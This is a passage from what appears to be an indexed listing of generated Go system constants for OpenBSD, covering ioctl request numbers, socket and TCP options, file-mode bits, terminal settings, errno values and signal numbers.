= 0xc02069ae constant SIOCGETPFLOW (line 1321) | SIOCGETPFLOW = 0xc02069fe constant SIOCGETPFSYNC (line 1322) | SIOCGETPFSYNC = 0xc02069f8 constant SIOCGETSGCNT (line 1323) | SIOCGETSGCNT = 0xc0207534 constant SIOCGETVIFCNT (line 1324) | SIOCGETVIFCNT = 0xc0287533 constant SIOCGETVLAN (line 1325) | SIOCGETVLAN = 0xc0206990 constant SIOCGIFADDR (line 1326) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFBRDADDR (line 1327) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCONF (line 1328) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDATA (line 1329) | SIOCGIFDATA = 0xc020691b constant SIOCGIFDESCR (line 1330) | SIOCGIFDESCR = 0xc0206981 constant SIOCGIFDSTADDR (line 1331) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1332) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGATTR (line 1333) | SIOCGIFGATTR = 0xc028698b constant SIOCGIFGENERIC (line 1334) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGLIST (line 1335) | SIOCGIFGLIST = 0xc028698d constant SIOCGIFGMEMB (line 1336) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1337) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFHARDMTU (line 1338) | SIOCGIFHARDMTU = 0xc02069a5 constant SIOCGIFLLPRIO (line 1339) | SIOCGIFLLPRIO = 0xc02069b6 constant SIOCGIFMEDIA (line 1340) | SIOCGIFMEDIA = 0xc0406938 constant SIOCGIFMETRIC (line 1341) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1342) | SIOCGIFMTU = 0xc020697e constant SIOCGIFNETMASK (line 1343) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPAIR (line 1344) | SIOCGIFPAIR = 0xc02069b1 constant SIOCGIFPARENT (line 1345) | SIOCGIFPARENT = 0xc02069b3 constant SIOCGIFPRIORITY (line 1346) | SIOCGIFPRIORITY = 0xc020699c constant SIOCGIFRDOMAIN (line 1347) | SIOCGIFRDOMAIN = 0xc02069a0 constant SIOCGIFRTLABEL (line 1348) | SIOCGIFRTLABEL = 0xc0206983 constant SIOCGIFRXR (line 1349) | SIOCGIFRXR = 0x802069aa constant SIOCGIFSFFPAGE (line 1350) | SIOCGIFSFFPAGE = 0xc1126939 constant SIOCGIFXFLAGS (line 1351) | SIOCGIFXFLAGS = 0xc020699e constant SIOCGLIFPHYADDR (line 1352) | SIOCGLIFPHYADDR = 0xc218694b constant SIOCGLIFPHYDF (line 1353) | SIOCGLIFPHYDF = 0xc02069c2 constant SIOCGLIFPHYECN (line 1354) | SIOCGLIFPHYECN = 0xc02069c8 constant SIOCGLIFPHYRTABLE (line 1355) | SIOCGLIFPHYRTABLE = 0xc02069a2 constant SIOCGLIFPHYTTL (line 1356) | SIOCGLIFPHYTTL = 0xc02069a9 constant SIOCGPGRP (line 1357) | SIOCGPGRP = 0x40047309 constant SIOCGPWE3 (line 1358) | SIOCGPWE3 = 0xc0206998 constant SIOCGPWE3CTRLWORD (line 1359) | SIOCGPWE3CTRLWORD = 0xc02069dc constant SIOCGPWE3FAT (line 1360) | SIOCGPWE3FAT = 0xc02069dd constant SIOCGPWE3NEIGHBOR (line 1361) | SIOCGPWE3NEIGHBOR = 0xc21869de constant SIOCGRXHPRIO (line 1362) | SIOCGRXHPRIO = 0xc02069db constant SIOCGSPPPPARAMS (line 1363) | SIOCGSPPPPARAMS = 0xc0206994 constant SIOCGTXHPRIO (line 1364) | SIOCGTXHPRIO = 0xc02069c6 constant SIOCGUMBINFO (line 1365) | SIOCGUMBINFO = 0xc02069be constant SIOCGUMBPARAM (line 1366) | SIOCGUMBPARAM = 0xc02069c0 constant SIOCGVH (line 1367) | SIOCGVH = 0xc02069f6 constant SIOCGVNETFLOWID (line 1368) | SIOCGVNETFLOWID = 0xc02069c4 constant SIOCGVNETID (line 1369) | SIOCGVNETID = 0xc02069a7 constant SIOCIFAFATTACH (line 1370) | SIOCIFAFATTACH = 0x801169ab constant SIOCIFAFDETACH (line 1371) | SIOCIFAFDETACH = 0x801169ac constant SIOCIFCREATE (line 1372) | SIOCIFCREATE = 0x8020697a constant SIOCIFDESTROY (line 1373) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1374) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSETKALIVE (line 1375) | SIOCSETKALIVE = 0x801869a3 constant SIOCSETLABEL (line 1376) | SIOCSETLABEL = 0x80206999 constant SIOCSETMPWCFG (line 1377) | SIOCSETMPWCFG = 0x802069ad constant SIOCSETPFLOW (line 1378) | SIOCSETPFLOW = 0x802069fd constant SIOCSETPFSYNC (line 1379) | SIOCSETPFSYNC = 0x802069f7 constant SIOCSETVLAN (line 1380) | SIOCSETVLAN = 0x8020698f constant SIOCSIFADDR (line 1381) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1382) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFDESCR (line 1383) | SIOCSIFDESCR = 0x80206980 constant SIOCSIFDSTADDR (line 1384) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1385) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGATTR (line 1386) | SIOCSIFGATTR = 0x8028698c constant SIOCSIFGENERIC (line 1387) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1388) | SIOCSIFLLADDR = 0x8020691f constant SIOCSIFLLPRIO (line 1389) | SIOCSIFLLPRIO = 0x802069b5 constant SIOCSIFMEDIA (line 1390) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1391) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1392) | SIOCSIFMTU = 0x8020697f constant SIOCSIFNETMASK (line 1393) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPAIR (line 1394) | SIOCSIFPAIR = 0x802069b0 constant SIOCSIFPARENT (line 1395) | SIOCSIFPARENT = 0x802069b2 constant SIOCSIFPRIORITY (line 1396) | SIOCSIFPRIORITY = 0x8020699b constant SIOCSIFRDOMAIN (line 1397) | SIOCSIFRDOMAIN = 0x8020699f constant SIOCSIFRTLABEL (line 1398) | SIOCSIFRTLABEL = 0x80206982 constant SIOCSIFXFLAGS (line 1399) | SIOCSIFXFLAGS = 0x8020699d constant SIOCSLIFPHYADDR (line 1400) | SIOCSLIFPHYADDR = 0x8218694a constant SIOCSLIFPHYDF (line 1401) | SIOCSLIFPHYDF = 0x802069c1 constant SIOCSLIFPHYECN (line 1402) | SIOCSLIFPHYECN = 0x802069c7 constant SIOCSLIFPHYRTABLE (line 1403) | SIOCSLIFPHYRTABLE = 0x802069a1 constant SIOCSLIFPHYTTL (line 1404) | SIOCSLIFPHYTTL = 0x802069a8 constant SIOCSPGRP (line 1405) | SIOCSPGRP = 0x80047308 constant SIOCSPWE3CTRLWORD (line 1406) | SIOCSPWE3CTRLWORD = 0x802069dc constant SIOCSPWE3FAT (line 1407) | SIOCSPWE3FAT = 0x802069dd constant SIOCSPWE3NEIGHBOR (line 1408) | SIOCSPWE3NEIGHBOR = 0x821869de constant SIOCSRXHPRIO (line 1409) | SIOCSRXHPRIO = 0x802069db constant SIOCSSPPPPARAMS (line 1410) | SIOCSSPPPPARAMS = 0x80206993 constant SIOCSTXHPRIO (line 1411) | SIOCSTXHPRIO = 0x802069c5 constant SIOCSUMBPARAM (line 1412) | SIOCSUMBPARAM = 0x802069bf constant SIOCSVH (line 1413) | SIOCSVH = 0xc02069f5 constant SIOCSVNETFLOWID (line 1414) | SIOCSVNETFLOWID = 0x802069c3 constant SIOCSVNETID (line 1415) | SIOCSVNETID = 0x802069a6 constant SOCK_CLOEXEC (line 1416) | SOCK_CLOEXEC = 0x8000 constant SOCK_DGRAM (line 1417) | SOCK_DGRAM = 0x2 constant SOCK_DNS (line 1418) | SOCK_DNS = 0x1000 constant SOCK_NONBLOCK (line 1419) | SOCK_NONBLOCK = 0x4000 constant SOCK_RAW (line 1420) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1421) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1422) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1423) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1424) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1425) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1426) | SO_ACCEPTCONN = 0x2 constant SO_BINDANY (line 1427) | SO_BINDANY = 0x1000 constant SO_BROADCAST (line 1428) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1429) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1430) | SO_DOMAIN = 0x1024 constant SO_DONTROUTE (line 1431) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1432) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1433) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1434) | SO_LINGER = 0x80 constant SO_NETPROC (line 1435) | SO_NETPROC = 0x1020 constant SO_OOBINLINE (line 1436) | SO_OOBINLINE = 0x100 constant SO_PEERCRED (line 1437) | SO_PEERCRED = 0x1022 constant SO_PROTOCOL (line 1438) | SO_PROTOCOL = 0x1025 constant SO_RCVBUF (line 1439) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1440) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1441) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1442) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1443) | SO_REUSEPORT = 0x200 constant SO_RTABLE (line 1444) | SO_RTABLE = 0x1021 constant SO_SNDBUF (line 1445) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1446) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1447) | SO_SNDTIMEO = 0x1005 constant SO_SPLICE (line 1448) | SO_SPLICE = 0x1023 constant SO_TIMESTAMP (line 1449) | SO_TIMESTAMP = 0x800 constant SO_TYPE (line 1450) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1451) | SO_USELOOPBACK = 0x40 constant SO_ZEROIZE (line 1452) | SO_ZEROIZE = 0x2000 constant S_BLKSIZE (line 1453) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1454) | S_IEXEC = 0x40 constant S_IFBLK (line 1455) | S_IFBLK = 0x6000 constant S_IFCHR (line 1456) | S_IFCHR = 0x2000 constant S_IFDIR (line 1457) | S_IFDIR = 0x4000 constant S_IFIFO (line 1458) | S_IFIFO = 0x1000 constant S_IFLNK (line 1459) | S_IFLNK = 0xa000 constant S_IFMT (line 1460) | S_IFMT = 0xf000 constant S_IFREG (line 1461) | S_IFREG = 0x8000 constant S_IFSOCK (line 1462) | S_IFSOCK = 0xc000 constant S_IREAD (line 1463) | S_IREAD = 0x100 constant S_IRGRP (line 1464) | S_IRGRP = 0x20 constant S_IROTH (line 1465) | S_IROTH = 0x4 constant S_IRUSR (line 1466) | S_IRUSR = 0x100 constant S_IRWXG (line 1467) | S_IRWXG = 0x38 constant S_IRWXO (line 1468) | S_IRWXO = 0x7 constant S_IRWXU (line 1469) | S_IRWXU = 0x1c0 constant S_ISGID (line 1470) | S_ISGID = 0x400 constant S_ISTXT (line 1471) | S_ISTXT = 0x200 constant S_ISUID (line 1472) | S_ISUID = 0x800 constant S_ISVTX (line 1473) | S_ISVTX = 0x200 constant S_IWGRP (line 1474) | S_IWGRP = 0x10 constant S_IWOTH (line 1475) | S_IWOTH = 0x2 constant S_IWRITE (line 1476) | S_IWRITE = 0x80 constant S_IWUSR (line 1477) | S_IWUSR = 0x80 constant S_IXGRP (line 1478) | S_IXGRP = 0x8 constant S_IXOTH (line 1479) | S_IXOTH = 0x1 constant S_IXUSR (line 1480) | S_IXUSR = 0x40 constant TCIFLUSH (line 1481) | TCIFLUSH = 0x1 constant TCIOFF (line 1482) | TCIOFF = 0x3 constant TCIOFLUSH (line 1483) | TCIOFLUSH = 0x3 constant TCION (line 1484) | TCION = 0x4 constant TCOFLUSH (line 1485) | TCOFLUSH = 0x2 constant TCOOFF (line 1486) | TCOOFF = 0x1 constant TCOON (line 1487) | TCOON = 0x2 constant TCPOPT_EOL (line 1488) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 1489) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1490) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1491) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1492) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1493) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1494) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1495) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1496) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1497) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1498) | TCPOPT_WINDOW = 0x3 constant TCP_INFO (line 1499) | TCP_INFO = 0x9 constant TCP_MAXSEG (line 1500) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1501) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1502) | TCP_MAX_SACK = 0x3 constant TCP_MAX_WINSHIFT (line 1503) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1504) | TCP_MD5SIG = 0x4 constant TCP_MSS (line 1505) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1506) | TCP_NODELAY = 0x1 constant TCP_NOPUSH (line 1507) | TCP_NOPUSH = 0x10 constant TCP_SACKHOLE_LIMIT (line 1508) | TCP_SACKHOLE_LIMIT = 0x80 constant TCP_SACK_ENABLE (line 1509) | TCP_SACK_ENABLE = 0x8 constant TCSAFLUSH (line 1510) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1511) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1512) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1513) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1514) | TIOCCDTR = 0x20007478 constant TIOCCHKVERAUTH (line 1515) | TIOCCHKVERAUTH = 0x2000741e constant TIOCCLRVERAUTH (line 1516) | TIOCCLRVERAUTH = 0x2000741d constant TIOCCONS (line 1517) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1518) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1519) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1520) | TIOCEXT = 0x80047460 constant TIOCFLAG_CLOCAL (line 1521) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1522) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1523) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_PPS (line 1524) | TIOCFLAG_PPS = 0x10 constant TIOCFLAG_SOFTCAR (line 1525) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1526) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1527) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1528) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1529) | TIOCGFLAGS = 0x4004745d constant TIOCGPGRP (line 1530) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1531) | TIOCGSID = 0x40047463 constant TIOCGTSTAMP (line 1532) | TIOCGTSTAMP = 0x4010745b constant TIOCGWINSZ (line 1533) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1534) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1535) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1536) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1537) | TIOCMODG = 0x4004746a constant TIOCMODS (line 1538) | TIOCMODS = 0x8004746d constant TIOCMSET (line 1539) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1540) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1541) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1542) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1543) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1544) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1545) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1546) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1547) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1548) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1549) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1550) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1551) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1552) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1553) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1554) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1555) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1556) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1557) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1558) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1559) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1560) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1561) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1562) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1563) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1564) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1565) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1566) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1567) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1568) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1569) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1570) | TIOCSETD = 0x8004741b constant TIOCSETVERAUTH (line 1571) | TIOCSETVERAUTH = 0x8004741c constant TIOCSFLAGS (line 1572) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1573) | TIOCSIG = 0x8004745f constant TIOCSPGRP (line 1574) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1575) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1576) | TIOCSTAT = 0x20007465 constant TIOCSTOP (line 1577) | TIOCSTOP = 0x2000746f constant TIOCSTSTAMP (line 1578) | TIOCSTSTAMP = 0x8008745a constant TIOCSWINSZ (line 1579) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1580) | TIOCUCNTL = 0x80047466 constant TIOCUCNTL_CBRK (line 1581) | TIOCUCNTL_CBRK = 0x7a constant TIOCUCNTL_SBRK (line 1582) | TIOCUCNTL_SBRK = 0x7b constant TOSTOP (line 1583) | TOSTOP = 0x400000 constant UTIME_NOW (line 1584) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1585) | UTIME_OMIT = -0x1 constant VDISCARD (line 1586) | VDISCARD = 0xf constant VDSUSP (line 1587) | VDSUSP = 0xb constant VEOF (line 1588) | VEOF = 0x0 constant VEOL (line 1589) | VEOL = 0x1 constant VEOL2 (line 1590) | VEOL2 = 0x2 constant VERASE (line 1591) | VERASE = 0x3 constant VINTR (line 1592) | VINTR = 0x8 constant VKILL (line 1593) | VKILL = 0x5 constant VLNEXT (line 1594) | VLNEXT = 0xe constant VMIN (line 1595) | VMIN = 0x10 constant VM_ANONMIN (line 1596) | VM_ANONMIN = 0x7 constant VM_LOADAVG (line 1597) | VM_LOADAVG = 0x2 constant VM_MALLOC_CONF (line 1598) | VM_MALLOC_CONF = 0xc constant VM_MAXID (line 1599) | VM_MAXID = 0xd constant VM_MAXSLP (line 1600) | VM_MAXSLP = 0xa constant VM_METER (line 1601) | VM_METER = 0x1 constant VM_NKMEMPAGES (line 1602) | VM_NKMEMPAGES = 0x6 constant VM_PSSTRINGS (line 1603) | VM_PSSTRINGS = 0x3 constant VM_SWAPENCRYPT (line 1604) | VM_SWAPENCRYPT = 0x5 constant VM_USPACE (line 1605) | VM_USPACE = 0xb constant VM_UVMEXP (line 1606) | VM_UVMEXP = 0x4 constant VM_VNODEMIN (line 1607) | VM_VNODEMIN = 0x9 constant VM_VTEXTMIN (line 1608) | VM_VTEXTMIN = 0x8 constant VQUIT (line 1609) | VQUIT = 0x9 constant VREPRINT (line 1610) | VREPRINT = 0x6 constant VSTART (line 1611) | VSTART = 0xc constant VSTATUS (line 1612) | VSTATUS = 0x12 constant VSTOP (line 1613) | VSTOP = 0xd constant VSUSP (line 1614) | VSUSP = 0xa constant VTIME (line 1615) | VTIME = 0x11 constant VWERASE (line 1616) | VWERASE = 0x4 constant WALTSIG (line 1617) | WALTSIG = 0x4 constant WCONTINUED (line 1618) | WCONTINUED = 0x8 constant WCOREFLAG (line 1619) | WCOREFLAG = 0x80 constant WNOHANG (line 1620) | WNOHANG = 0x1 constant WUNTRACED (line 1621) | WUNTRACED = 0x2 constant XCASE (line 1622) | XCASE = 0x1000000 constant E2BIG (line 1627) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1628) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1629) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1630) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1631) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1632) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1633) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1634) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1635) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1636) | EBADMSG = syscall.Errno(0x5c) constant EBADRPC (line 1637) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1638) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1639) | ECANCELED = syscall.Errno(0x58) constant ECHILD (line 1640) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1641) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1642) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1643) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1644) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1645) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1646) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1647) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1648) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1649) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1650) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1651) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1652) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1653) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1654) | EIDRM = syscall.Errno(0x59) constant EILSEQ (line 1655) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 1656) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1657) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1658) | EINVAL = syscall.Errno(0x16) constant EIO (line 1659) | EIO = syscall.Errno(0x5) constant EIPSEC (line 1660) | EIPSEC = syscall.Errno(0x52) constant EISCONN (line 1661) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1662) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1663) | ELAST = syscall.Errno(0x5f) constant ELOOP (line 1664) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 1665) | EMEDIUMTYPE = syscall.Errno(0x56) constant EMFILE (line 1666) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1667) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1668) | EMSGSIZE = syscall.Errno(0x28) constant ENAMETOOLONG (line 1669) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1670) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1671) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1672) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1673) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1674) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1675) | ENOATTR = syscall.Errno(0x53) constant ENOBUFS (line 1676) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1677) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1678) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1679) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1680) | ENOLCK = syscall.Errno(0x4d) constant ENOMEDIUM (line 1681) | ENOMEDIUM = syscall.Errno(0x55) constant ENOMEM (line 1682) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1683) | ENOMSG = syscall.Errno(0x5a) constant ENOPROTOOPT (line 1684) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1685) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1686) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1687) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1688) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1689) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1690) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1691) | ENOTRECOVERABLE = syscall.Errno(0x5d) constant ENOTSOCK (line 1692) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1693) | ENOTSUP = syscall.Errno(0x5b) constant ENOTTY (line 1694) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1695) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1696) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1697) | EOVERFLOW = syscall.Errno(0x57) constant EOWNERDEAD (line 1698) | EOWNERDEAD = syscall.Errno(0x5e) constant EPERM (line 1699) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1700) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1701) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1702) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1703) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1704) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1705) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1706) | EPROTO = syscall.Errno(0x5f) constant EPROTONOSUPPORT (line 1707) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1708) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1709) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1710) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1711) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1712) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1713) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1714) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1715) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1716) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1717) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1718) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1719) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1720) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1721) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1722) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1723) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1728) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1729) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1730) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1731) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1732) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1733) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1734) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1735) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1736) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1737) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1738) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1739) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1740) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1741) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1742) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1743) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1744) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1745) | SIGSEGV = 